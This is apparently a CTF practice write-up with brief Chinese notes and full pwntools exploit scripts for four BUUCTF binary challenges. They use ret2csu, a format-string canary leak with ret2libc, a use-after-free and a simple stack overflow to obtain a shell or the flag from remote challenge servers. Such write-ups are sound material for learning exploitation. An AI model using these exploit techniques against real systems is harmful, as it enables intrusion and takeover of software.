PWN-PRACTICE-BUUCTF-10
- jarvisoj_level3_x64
- bjdctf_2020_babyrop2
- hitcontraining_uaf
- jarvisoj_test_your_memory
jarvisoj_level3_x64
64位elf的栈溢出,ret2csu
from pwn import *
#context.log_level='debug'
#io=process('./jarvisoj_level3_x64')
io=remote('node4.buuoj.cn',29473)
elf=ELF('./jarvisoj_level3_x64')
libc=ELF('./libc-2.23-x64.so')
part1=0x4006AA
part2=0x400690
write_plt=elf.plt['write']
write_got=elf.got['write']
read_got=elf.got['read']
main_addr=elf.sym['main']
pop_rdi=0x4006b3
io.recvuntil('Input:\n')
payload='a'*(0x80+8)
def com_gadget(part1, part2, jmp2, arg1 = 0x0, arg2 = 0x0, arg3 = 0x0):payload = p64(part1) # part1 entry pop_rbx_rbp_r12_r13_r14_r15_retpayload += p64(0x0) # rbx must be 0x0payload += p64(0x1) # rbp must be 0x1payload += p64(jmp2) # r12 jump topayload += p64(arg3) # r13 -> rdx arg3payload += p64(arg2) # r14 -> rsi arg2payload += p64(arg1) # r15d -> edi arg1payload += p64(part2) # part2 entry will call [r12+rbx*0x8]payload += 'A' * 56 # junk 6*8+8=56return payload
payload+=com_gadget(part1,part2,write_got,1,read_got,8)
payload+=p64(main_addr)
io.sendline(payload)
read_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(read_addr))
libc_base=read_addr-libc.sym['read']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
io.recvuntil('Input:\n')
payload='a'*(0x80+8)+p64(pop_rdi)+p64(binsh)+p64(system)+p64(main_addr)
io.sendline(payload)
io.interactive()
bjdctf_2020_babyrop2
格式化字符串泄露canary,然后栈溢出ret2libc
from pwn import *
#context.log_level='debug'
#io=process('./bjdctf_2020_babyrop2')
io=remote('node4.buuoj.cn',28650)
elf=ELF('./bjdctf_2020_babyrop2')
libc=ELF('./libc-2.23-x64.so')
puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
vuln_addr=elf.sym['vuln']
pop_rdi=0x400993
io.recvuntil('help u!\n')
io.sendline('%7$lx')
canary=int(io.recvuntil('\n')[:-1],16)
print(hex(canary))
io.recvuntil('story!\n')
payload='a'*(0x20-8)+p64(canary)+'b'*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln_addr)
io.sendline(payload)
puts_addr=u64(io.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
system=libc_base+libc.sym['system']
binsh=libc_base+libc.search('/bin/sh\x00').next()
payload1='a'*(0x20-8)+p64(canary)+'b'*8+p64(pop_rdi)+p64(binsh)+p64(system)+p64(vuln_addr)
io.recvuntil('story!\n')
io.sendline(payload1)
io.interactive()
hitcontraining_uaf
参考:[BUUCTF]PWN——hitcontraining_uaf
from pwn import*
io=remote('node4.buuoj.cn',26666)
#io=process('./hacknote')
elf=ELF('./hacknote')def add(size,content):io.sendlineafter('choice :','1')io.sendlineafter('Note size :',str(size))io.sendlineafter('Content :',content)def delete(idx):io.sendlineafter('choice :','2')io.sendlineafter('Index :',str(idx))def print_(idx):io.sendlineafter('choice :','3')io.sendlineafter('Index :',str(idx))magic=0x8048945add(0x10,'aaaa')
add(0x10,'bbbb')delete(0)
delete(1)add(8,p32(magic))print_(0)io.interactive()jarvisoj_test_your_memory
题目给出了字符串"cat flag"的地址
mem_test函数中存在栈溢出漏洞
ret到win_func函数,字符串"cat flag"的地址作为参数,执行system(“cat flag”)打印flag
from pwn import *
#context.log_level='debug'
#io=process('./memory')
io=remote('node4.buuoj.cn',25669)
win_func=0x080485BD
flag_addr=0x080487E0
payload='a'*(0x13+4)+p32(win_func)+p32(0x08048677)+p32(flag_addr)
io.sendline(payload)
io.interactive()
)
)
